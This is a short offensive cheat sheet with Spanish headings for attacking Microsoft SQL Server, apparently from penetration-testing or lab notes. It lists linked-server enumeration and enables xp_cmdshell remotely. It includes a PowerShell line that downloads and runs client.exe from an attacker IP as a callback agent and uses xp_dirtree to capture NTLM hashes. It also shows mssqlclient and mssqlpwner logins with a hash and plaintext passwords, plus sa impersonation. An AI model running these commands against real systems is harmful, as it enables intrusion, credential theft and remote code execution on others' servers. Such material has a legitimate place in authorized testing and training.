Enumeración

EXEC sp_linkedservers;
SELECT * FROM sys.servers;

Linked Server → RCE

EXEC ('sp_configure ''show advanced options'',1;RECONFIGURE;') AT [SQL53];
EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT [SQL53];
EXEC [SQL53].master..xp_cmdshell '
powershell -c "iwr <http://192.168.45.181/client.exe> -o C:\Users\Public\client.exe;
C:\Users\Public\client.exe --url ws://192.168.45.181:8000/ws"
';

Captura NTLM

EXEC master.sys.xp_dirtree '\\192.168.45.181\l';

Acceso interactivo

impacket-mssqlclient webapp11:[email protected] -db music
mssqlpwner -hashes ':73a34bad3e589783936fcd0a407dcf39' cowmotors-int.com/'web01$'@172.16.111.223 -windows-auth interactive
mssqlpwner 'signed.htb/mssqlsvc:purPLE9795!@'@10.10.11.90 -windows-auth interactive

Linked Server con credenciales

EXEC sp_addlinkedsrvlogin
 @rmtsrvname='SQL03',
 @useself='false',
 @locallogin=NULL,
 @rmtuser='sa',
 @rmtpassword='TuContraseña';

Impersonar SA

EXECUTE AS LOGIN = 'sa';